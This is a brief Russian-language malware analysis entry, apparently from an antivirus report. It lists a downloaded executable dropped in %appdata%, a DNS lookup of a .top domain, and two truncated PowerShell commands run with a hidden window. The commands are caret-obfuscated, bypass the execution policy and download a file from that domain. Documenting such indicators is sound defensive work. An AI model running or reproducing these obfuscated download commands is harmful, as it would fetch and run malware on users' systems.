Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^Wersh^ell^.EXE^ -^ExeCUTIon^Po^L^Icy ^b^ypaS^s^ -No^pR^o^f^ILE^ ^-^winDOW^STyL^E HIDdEn (^New-^O^b^Jec^t s^YsTe^M.n^E^t^.WEb^C^l^IEN^T^).dOw^N^loadFIL^E(^'http://roggistazli...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "PO^Wersh^ell^.EXE^ -^ExeCUTIon^Po^L^Icy ^b^ypaS^s^ -No^pR^o^f^ILE^ ^-^winDOW^STyL^E HIDdEn (^New-^O^b^Jec^t s^YsTe^M.n^E^t^.WEb^C^l^IEN^T^).dOw^N^loadFIL^E(^'http://roggistazli...' (со скрытым окном)